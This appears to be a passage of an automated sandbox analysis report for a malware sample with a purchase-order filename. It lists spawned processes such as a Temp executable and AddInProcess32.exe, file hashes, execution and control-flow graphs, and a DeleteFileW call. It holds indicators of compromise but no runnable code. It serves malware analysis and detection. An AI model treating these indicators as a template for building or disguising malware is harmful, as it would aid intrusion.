                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\sages.exe"
                                                                                                                                              Imagebase:
                                                                                                                                              File size:78'336 bytes
                                                                                                                                              MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                                                                                                              Has elevated privileges:
                                                                                                                                              Has administrator privileges:
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:27
                                                                                                                                              Start time:12:56:48
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\sages.exe
                                                                                                                                              Wow64 process (32bit):
                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\sages.exe"
                                                                                                                                              Imagebase:
                                                                                                                                              File size:78'336 bytes
                                                                                                                                              MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                                                                                                              Has elevated privileges:
                                                                                                                                              Has administrator privileges:
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:28
                                                                                                                                              Start time:12:56:54
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                              Wow64 process (32bit):
                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                              Imagebase:
                                                                                                                                              File size:597'432 bytes
                                                                                                                                              MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                              Has elevated privileges:
                                                                                                                                              Has administrator privileges:
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:29
                                                                                                                                              Start time:12:57:00
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                              Wow64 process (32bit):
                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                              Imagebase:
                                                                                                                                              File size:43'008 bytes
                                                                                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                              Has elevated privileges:
                                                                                                                                              Has administrator privileges:
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:30
                                                                                                                                              Start time:12:57:32
                                                                                                                                              Start date:28/11/2024
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                              Wow64 process (32bit):
                                                                                                                                              Commandline:
                                                                                                                                              Imagebase:
                                                                                                                                              File size:43'008 bytes
                                                                                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                              Has elevated privileges:
                                                                                                                                              Has administrator privileges:
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              Disassembly

                                                                                                                                              Reset < >

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:32.4%
                                                                                                                                                Dynamic/Decrypted Code Coverage:30.8%
                                                                                                                                                Signature Coverage:26.9%
                                                                                                                                                Total number of Nodes:26
                                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                                execution_graph 24814 313dcb0 24816 313dcc0 24814->24816 24815 313eea1 24816->24815 24819 72e0006 24816->24819 24823 72e0040 24816->24823 24820 72e0040 24819->24820 24827 72e62d7 24820->24827 24821 72e57a7 24821->24815 24824 72e006a 24823->24824 24826 72e62d7 DeleteFileW 24824->24826 24825 72e57a7 24825->24815 24826->24825 24828 72e6300 24827->24828 24829 72e6340 24827->24829 24828->24821 24830 72e63de 24829->24830 24834 72e655c 24829->24834 24838 72e6588 24829->24838 24830->24821 24831 72e642a 24831->24821 24835 72e6555 24834->24835 24835->24834 24842 72e6c6a 24835->24842 24839 72e659f 24838->24839 24841 72e6c6a DeleteFileW 24839->24841 24840 72e683a 24840->24831 24841->24840 24843 72e6c72 24842->24843 24846 72e6fd8 24843->24846 24847 72e701e DeleteFileW 24846->24847 24849 72e683a 24847->24849 24849->24831

                                                                                                                                                Executed Functions

                                                                                                                                                Function 077B001F Relevance: 5.5, Instructions: 5523COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 77b001f-77b0275 29 77b027b-77b0f8a 0->29 30 77b22cf-77b257b 0->30 428 77b1309-77b22c7 29->428 429 77b0f90-77b1301 29->429 97 77b345a-77b43ea 30->97 98 77b2581-77b3452 30->98 659 77b476f-77b4782 97->659 660 77b43f0-77b4767 97->660 98->97 428->30 429->428 665 77b4788-77b4dba 659->665 666 77b4dc2-77b5c4e 659->666 660->659 665->666 1048 77b5c4e call 77b725d 666->1048 1049 77b5c4e call 77b726c 666->1049 1046 77b5c54-77b5c5b 1048->1046 1049->1046
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 479f5df8a401a8589a64b6112f0feff97430fedf85ac5612184edf19523f0257
                                                                                                                                                • Instruction ID: 420c7141a29000ebe440dcf50e957ecf196f9005cafa65b61d80b4023b2f4938
                                                                                                                                                • Opcode Fuzzy Hash: 479f5df8a401a8589a64b6112f0feff97430fedf85ac5612184edf19523f0257
                                                                                                                                                • Instruction Fuzzy Hash: 07B30670E11228CFCB58EF78D989AACBBB2FB89300F4085E9D449A7350DB345E958F55
                                                                                                                                                Function 077B0040 Relevance: 5.5, Instructions: 5499COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1050 77b0040-77b0275 1078 77b027b-77b0f8a 1050->1078 1079 77b22cf-77b257b 1050->1079 1477 77b1309-77b22c7 1078->1477 1478 77b0f90-77b1301 1078->1478 1146 77b345a-77b43ea 1079->1146 1147 77b2581-77b3452 1079->1147 1708 77b476f-77b4782 1146->1708 1709 77b43f0-77b4767 1146->1709 1147->1146 1477->1079 1478->1477 1714 77b4788-77b4dba 1708->1714 1715 77b4dc2-77b5c4e 1708->1715 1709->1708 1714->1715 2097 77b5c4e call 77b725d 1715->2097 2098 77b5c4e call 77b726c 1715->2098 2095 77b5c54-77b5c5b 2097->2095 2098->2095
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1fe9c00ec437679dbb42ee11be80895cdb0b92cb2bcc227136cbda0b2942e6d2
                                                                                                                                                • Instruction ID: 5804b42ace1f6ecb98384f83b53c65fbfe81ba5854eac4741f7565b5fc119929
                                                                                                                                                • Opcode Fuzzy Hash: 1fe9c00ec437679dbb42ee11be80895cdb0b92cb2bcc227136cbda0b2942e6d2
                                                                                                                                                • Instruction Fuzzy Hash: 47B30770E11228CFCB58EF78D989AACBBB2FB89300F4085E9D449A7350DB345E958F55
                                                                                                                                                Function 072E0006 Relevance: 5.3, Instructions: 5262COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 2099 72e0006-72e57a1 call 72e62d7 3052 72e57a7-72e57ae 2099->3052
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1258932762.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_72e0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 69ea42a64d04e748d8aaabed1e985564db0a89a0d0a5116208b550aa565785ad
                                                                                                                                                • Instruction ID: 4102d9f643ee5f2ec46aebe8558c43d8a4f0695b2311c177de76f9f489bbf573
                                                                                                                                                • Opcode Fuzzy Hash: 69ea42a64d04e748d8aaabed1e985564db0a89a0d0a5116208b550aa565785ad
                                                                                                                                                • Instruction Fuzzy Hash: CFB3F770A11219CFCB18EF79E98966CBBF2FB89200F4085E9D488A7350DF345E958F95
                                                                                                                                                Function 072E0040 Relevance: 5.2, Instructions: 5237COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 3054 72e0040-72e57a1 call 72e62d7 4006 72e57a7-72e57ae 3054->4006
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1258932762.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_72e0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4b8a1ea55273f7cf12e97da9045185bc36acb9fc8a004a8c64a73eb351de2f46
                                                                                                                                                • Instruction ID: 19de7b61e043d5ffa49d13284509fa827135f4bd9e1e36b7b7c9da98eb8d3fbc
                                                                                                                                                • Opcode Fuzzy Hash: 4b8a1ea55273f7cf12e97da9045185bc36acb9fc8a004a8c64a73eb351de2f46
                                                                                                                                                • Instruction Fuzzy Hash: 8CB3F770A11219CFCB18EF79E98966CBBF2FB89200F4085E9D488A7350DF345E958F95
                                                                                                                                                Function 077BA6BD Relevance: 2.3, Strings: 1, Instructions: 1029COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 4260 77ba6bd-77ba6ce 4261 77ba710-77ba720 4260->4261 4262 77ba6d0-77ba6da 4260->4262 4264 77ba721-77ba727 4261->4264 4263 77ba6dc-77ba70f 4262->4263 4262->4264 4263->4261 4265 77ba72d-77ba730 4264->4265 4266 77ba74e-77ba762 4265->4266 4267 77ba732-77ba735 4265->4267 4270 77ba7ae-77bad6f 4266->4270 4271 77ba764-77ba7ab 4266->4271 4267->4265 4268 77ba737-77ba74d 4267->4268 4268->4266 4351 77bb592-77bb5a6 4270->4351 4352 77bad75-77bad8d 4270->4352 4271->4270 4360 77bb5a7 4351->4360 4474 77bad8f call 3131570 4352->4474 4475 77bad8f call 3131580 4352->4475 4354 77bad94-77bae95 4354->4351 4370 77bae9b-77baea0 4354->4370 4360->4360 4371 77bafb2-77bb544 call 77bc2d0 call 77bd552 4370->4371 4372 77baea6-77baf73 4370->4372 4469 77bb54a-77bb571 4371->4469 4372->4351 4391 77baf79-77baf9a 4372->4391 4391->4371 4399 77baf9c-77bafa2 4391->4399 4400 77bafa6-77bafa8 4399->4400 4401 77bafa4 4399->4401 4400->4371 4401->4371 4469->4351 4474->4354 4475->4354
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @
                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                • Opcode ID: f95ed7d2e75a31e255580f39d5207ce34ab4edb516f9cf0bc2a1030b79889a45
                                                                                                                                                • Instruction ID: 92184db4ba2829675407fa488bf473f55e84143e787958becc18a6387627e7b2
                                                                                                                                                • Opcode Fuzzy Hash: f95ed7d2e75a31e255580f39d5207ce34ab4edb516f9cf0bc2a1030b79889a45
                                                                                                                                                • Instruction Fuzzy Hash: 2082B370E15216CFCB24ABB8D98976E7BB2EF89300F8085E9D849E7350DA3C5D45CB91
                                                                                                                                                Function 077BCA9A Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 4732 77bca9a-77bcaa6 4733 77bcaa9-77bcae6 4732->4733 4734 77bcaa8 4732->4734 4735 77bcb0b-77bcb28 call 77bbdd0 4733->4735 4736 77bcae8-77bcaef 4733->4736 4734->4733 4743 77bcb2a-77bcb30 4735->4743 4744 77bcb33-77bcb44 4735->4744 4737 77bd3a5-77bd3b0 4736->4737 4738 77bcaf5-77bcb00 4736->4738 4745 77bd3b7-77bd42b 4737->4745 4738->4735 4743->4744 4747 77bcb4a-77bcb5a call 77bbe30 4744->4747 4748 77bcbf2-77bcc15 4744->4748 4798 77bd432-77bd49e 4745->4798 4756 77bcb5c-77bcb75 4747->4756 4757 77bcbb7-77bcbba 4747->4757 4754 77bcc1b-77bcc28 4748->4754 4755 77bce62-77bce8f 4748->4755 4754->4755 4767 77bcc2e-77bcc34 4754->4767 4768 77bcf75-77bcf9b call 77bbed0 4755->4768 4769 77bce95-77bcea3 4755->4769 4765 77bcb7b-77bcb80 4756->4765 4766 77bd4a5-77bd4be 4756->4766 4758 77bcbc8-77bcbda 4757->4758 4759 77bcbbc-77bcbc3 4757->4759 4758->4766 4770 77bcbe0-77bcbed 4758->4770 4759->4755 4765->4755 4771 77bcb86-77bcbb2 4765->4771 4782 77bd4c1-77bd4c8 4766->4782 4783 77bd4c0 4766->4783 4774 77bcc3a-77bcc46 4767->4774 4775 77bcc36-77bcc38 4767->4775 4777 77bcfa0 4768->4777 4769->4768 4786 77bcea9-77bceb6 4769->4786 4770->4755 4771->4755 4778 77bcc48-77bcc57 4774->4778 4775->4778 4785 77bd396-77bd39d 4777->4785 4778->4745 4791 77bcc5d-77bcc61 4778->4791 4789 77bd4ca-77bd4cf 4782->4789 4790 77bd4d1-77bd4df 4782->4790 4783->4782 4796 77bcebc-77bcebf 4786->4796 4797 77bd3a0 4786->4797 4793 77bd543-77bd545 4789->4793 4805 77bd4e1-77bd4f1 4790->4805 4806 77bd537-77bd53c 4790->4806 4791->4798 4799 77bcc67-77bcc6e 4791->4799 4796->4797 4802 77bcec5-77bcee2 4796->4802 4797->4737 4798->4766 4799->4798 4803 77bcc74-77bcc7b 4799->4803 4823 77bcf25-77bcf4f 4802->4823 4824 77bcee4-77bceea 4802->4824 4807 77bcc81-77bcc88 4803->4807 4808 77bcd70-77bcd77 4803->4808 4805->4806 4810 77bd4f3-77bd503 4805->4810 4806->4793 4807->4766 4815 77bcc8e-77bcca9 4807->4815 4808->4755 4814 77bcd7d-77bcda1 4808->4814 4810->4806 4811 77bd505-77bd515 4810->4811 4811->4806 4817 77bd517-77bd525 4811->4817 4825 77bcdda-77bcdee 4814->4825 4826 77bcda3-77bcda9 4814->4826 4827 77bccab-77bccad 4815->4827 4828 77bccaf-77bccc9 4815->4828 4817->4806 4830 77bd527-77bd52d 4817->4830 4823->4785 4863 77bcf55-77bcf61 4823->4863 4824->4766 4831 77bcef0-77bcef6 4824->4831 4847 77bcdf2-77bcdfe 4825->4847 4848 77bcdf0 4825->4848 4832 77bcdab-77bcdad 4826->4832 4833 77bcdaf-77bcdbb 4826->4833 4834 77bcccb-77bccd9 4827->4834 4828->4834 4838 77bd52f 4830->4838 4839 77bd531 4830->4839 4841 77bcf09-77bcf11 4831->4841 4842 77bcef8-77bcefb 4831->4842 4843 77bcdbd-77bcdc6 4832->4843 4833->4843 4835 77bccdb-77bccea 4834->4835 4836 77bccfe-77bcd2e 4834->4836 4835->4836 4862 77bccec-77bccfc 4835->4862 4846 77bd533-77bd535 4838->4846 4839->4846 4856 77bcf18-77bcf1b 4841->4856 4842->4766 4849 77bcf01-77bcf07 4842->4849 4843->4825 4861 77bcdc8-77bcdd8 4843->4861 4846->4806 4854 77bd53e 4846->4854 4853 77bce00-77bce12 4847->4853 4848->4853 4849->4856 4872 77bce4c-77bce5f 4853->4872 4854->4793 4856->4797 4865 77bcf21-77bcf23 4856->4865 4861->4825 4874 77bce14-77bce4a 4861->4874 4862->4836 4875 77bcd31-77bcd6d 4862->4875 4863->4768 4876 77bcf63 4863->4876 4865->4823 4865->4824 4874->4872 4876->4785
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ]
                                                                                                                                                • API String ID: 0-3352871620
                                                                                                                                                • Opcode ID: 3cd535792e7ded3788ef05be78b010a5bb15448c2e929954f13dfc65a72f417e
                                                                                                                                                • Instruction ID: adb16c4c1f4b09d8ca5ef19e86ee3d43465cf590dfaba519d3d4fcc5b258b02e
                                                                                                                                                • Opcode Fuzzy Hash: 3cd535792e7ded3788ef05be78b010a5bb15448c2e929954f13dfc65a72f417e
                                                                                                                                                • Instruction Fuzzy Hash: 3F028274B00219CFDB25DF68D854BAEBBB2BF89351F1480A9E9099B355CB34DC41CBA1
                                                                                                                                                Function 031328B8 Relevance: 1.2, Instructions: 1150COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: cc95525d463ecf5890b83b424a15d5937009a03e7530afb8771e60f7f0653f2b
                                                                                                                                                • Instruction ID: ead94d40d369fb40d8f503eeb3453bd7f8ce828edc3f390076e452578e2f6ba3
                                                                                                                                                • Opcode Fuzzy Hash: cc95525d463ecf5890b83b424a15d5937009a03e7530afb8771e60f7f0653f2b
                                                                                                                                                • Instruction Fuzzy Hash: 68A27F74A002199FCB14DF69C884AAEBBB6FF8D300F198569E415EB365DB34DD42CB90
                                                                                                                                                Function 077BA780 Relevance: .9, Instructions: 934COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 5551 77ba780-77bad6f 5631 77bb592-77bb5a6 5551->5631 5632 77bad75-77bad8d 5551->5632 5640 77bb5a7 5631->5640 5755 77bad8f call 3131570 5632->5755 5756 77bad8f call 3131580 5632->5756 5634 77bad94-77bae95 5634->5631 5650 77bae9b-77baea0 5634->5650 5640->5640 5651 77bafb2-77bb544 call 77bc2d0 call 77bd552 5650->5651 5652 77baea6-77baf73 5650->5652 5749 77bb54a-77bb571 5651->5749 5652->5631 5671 77baf79-77baf9a 5652->5671 5671->5651 5679 77baf9c-77bafa2 5671->5679 5680 77bafa6-77bafa8 5679->5680 5681 77bafa4 5679->5681 5680->5651 5681->5651 5749->5631 5755->5634 5756->5634
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 889acbb0f0c6b3e2894734886d8d37af94c93d478b7abda1d166b6f3dcd0e9c2
                                                                                                                                                • Instruction ID: 7b5e94471a9f45cd421363a8b8f12731f47664b656cd2f012f11ce5faaa2b3d2
                                                                                                                                                • Opcode Fuzzy Hash: 889acbb0f0c6b3e2894734886d8d37af94c93d478b7abda1d166b6f3dcd0e9c2
                                                                                                                                                • Instruction Fuzzy Hash: 9B727470E11215CBCB28EBB8D98976EBBB2EB89300F8085A9D849F7350DE3C5D45CB55
                                                                                                                                                Function 03137058 Relevance: .4, Instructions: 356COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 32328dec6f40105ba06c6f7b468e0b81b1da36fb3f65ca5ff3321d76206c6893
                                                                                                                                                • Instruction ID: 286dfd666d5eaa01d544aa14a03124b3c075ac2bd15a803b7a97eae91d450086
                                                                                                                                                • Opcode Fuzzy Hash: 32328dec6f40105ba06c6f7b468e0b81b1da36fb3f65ca5ff3321d76206c6893
                                                                                                                                                • Instruction Fuzzy Hash: 4FF1B274E00218DFDB68DFA9C984B9DBBB2BF89300F1481A9D549AB354EB349D85CF50
                                                                                                                                                Function 03136588 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9cc01cb2c5e2b7e668f1d62d8a543cf02051149c22470aa4f8f3c4787c68aea9
                                                                                                                                                • Instruction ID: c0f35a65655c4cb0ca4953964941279106c52eeaf75a6cba3323f9b448d2a5fe
                                                                                                                                                • Opcode Fuzzy Hash: 9cc01cb2c5e2b7e668f1d62d8a543cf02051149c22470aa4f8f3c4787c68aea9
                                                                                                                                                • Instruction Fuzzy Hash: EEB18470704215EFFF289A36948473EB6F7AFCF751F598429D88686288CF34C8858752
                                                                                                                                                Function 0313CD30 Relevance: 2.4, Strings: 1, Instructions: 1109COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 4008 313cd30-313cd61 call 313afe0 4011 313cd66-313d3b3 call 313aff0 call 313b000 call 313b010 4008->4011 4089 313d4b3-313d4c4 4011->4089 4090 313d4ca-313d5c6 4089->4090 4091 313d3b8-313d3be 4089->4091 4122 313da26-313db3e call 313b070 4090->4122 4123 313d5cc-313d6dc 4090->4123 4092 313d3c4-313d4ad call 313afc0 4091->4092 4093 313eeab-313f163 4091->4093 4092->4089 4132 313eea6 4092->4132 4171 313dc64-313dc72 4122->4171 4123->4132 4167 313d6e2-313d825 4123->4167 4132->4093 4167->4122 4218 313d82b-313d84a call 313b020 4167->4218 4176 313db43-313db75 4171->4176 4177 313dc78-313dc8b 4171->4177 4176->4171 4191 313db7b-313dc5f 4176->4191 4179 313dc92-313dca1 4177->4179 4186 313dca3 4179->4186 4187 313dcac 4179->4187 4186->4187 4187->4132 4229 313dc61 4191->4229 4230 313dc8d 4191->4230 4225 313d859-313d865 4218->4225 4226 313d84c-313d851 4218->4226 4225->4093 4227 313d86b-313da17 call 313b030 call 313b040 call 313b050 call 313b060 call 313b070 4225->4227 4226->4225 4227->4132 4259 313da1d-313da20 4227->4259 4229->4171 4230->4179 4259->4122 4259->4218
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: h3o
                                                                                                                                                • API String ID: 0-2140973757
                                                                                                                                                • Opcode ID: 8f459490219481401965f53800038716b171137d06a34546f722d22f921b4069
                                                                                                                                                • Instruction ID: 6e0fe3a875170bccf32cf1c330b3128149b1d9f682d36a3666668cee3e31453e
                                                                                                                                                • Opcode Fuzzy Hash: 8f459490219481401965f53800038716b171137d06a34546f722d22f921b4069
                                                                                                                                                • Instruction Fuzzy Hash: 49A24B74E15219CFCB18EFB8E9887ADBBB1FB88300F5085E9D449A3254DA385D85CF61
                                                                                                                                                Function 0313CCFF Relevance: 2.1, Strings: 1, Instructions: 833COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 4477 313ccff-313cd0c 4478 313cd2b-313cd4b 4477->4478 4479 313cd0e-313cd2a 4477->4479 4480 313cd55-313cd61 call 313afe0 4478->4480 4479->4478 4483 313cd66-313d3b3 call 313aff0 call 313b000 call 313b010 4480->4483 4561 313d4b3-313d4c4 4483->4561 4562 313d4ca-313d5c6 4561->4562 4563 313d3b8-313d3be 4561->4563 4594 313da26-313db3e call 313b070 4562->4594 4595 313d5cc-313d6dc 4562->4595 4564 313d3c4-313d4ad call 313afc0 4563->4564 4565 313eeab-313f163 4563->4565 4564->4561 4604 313eea6 4564->4604 4643 313dc64-313dc72 4594->4643 4595->4604 4639 313d6e2-313d825 4595->4639 4604->4565 4639->4594 4690 313d82b-313d84a call 313b020 4639->4690 4648 313db43-313db75 4643->4648 4649 313dc78-313dc8b 4643->4649 4648->4643 4663 313db7b-313dc5f 4648->4663 4651 313dc92-313dca1 4649->4651 4658 313dca3 4651->4658 4659 313dcac 4651->4659 4658->4659 4659->4604 4701 313dc61 4663->4701 4702 313dc8d 4663->4702 4697 313d859-313d865 4690->4697 4698 313d84c-313d851 4690->4698 4697->4565 4699 313d86b-313da17 call 313b030 call 313b040 call 313b050 call 313b060 call 313b070 4697->4699 4698->4697 4699->4604 4731 313da1d-313da20 4699->4731 4701->4643 4702->4651 4731->4594 4731->4690
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: h3o
                                                                                                                                                • API String ID: 0-2140973757
                                                                                                                                                • Opcode ID: 520944c5edd0eed74ed156e9c8ad5a0855fd15ed23a792b3a5cea4f983c2db35
                                                                                                                                                • Instruction ID: ae576c272f10bece48af8993ab6459b9e70df87b28dc504ed5aea917949b90aa
                                                                                                                                                • Opcode Fuzzy Hash: 520944c5edd0eed74ed156e9c8ad5a0855fd15ed23a792b3a5cea4f983c2db35
                                                                                                                                                • Instruction Fuzzy Hash: 17727C74E15219CFCB18EFB8E9887ADBBB1FB48300F5085EAD449A3254DA385D85CF61
                                                                                                                                                Function 072E6FD8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 4886 72e6fd8-72e7022 4888 72e702a-72e7055 DeleteFileW 4886->4888 4889 72e7024-72e7027 4886->4889 4890 72e705e-72e7086 4888->4890 4891 72e7057-72e705d 4888->4891 4889->4888 4891->4890
                                                                                                                                                APIs
                                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 072E7048
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1258932762.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_72e0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                • Opcode ID: b3021aa78330eb607df6361441252d8edba2cba63da31038747709454fca15d6
                                                                                                                                                • Instruction ID: 168cd60d948af6092923798564bf69d4a1b56923310a607b25a43e4b0cb69572
                                                                                                                                                • Opcode Fuzzy Hash: b3021aa78330eb607df6361441252d8edba2cba63da31038747709454fca15d6
                                                                                                                                                • Instruction Fuzzy Hash: DD11F4B6C0065A9BCB10CF9AD844BDEFBB4EF48320F14852AD858B7340D778A945CFA5
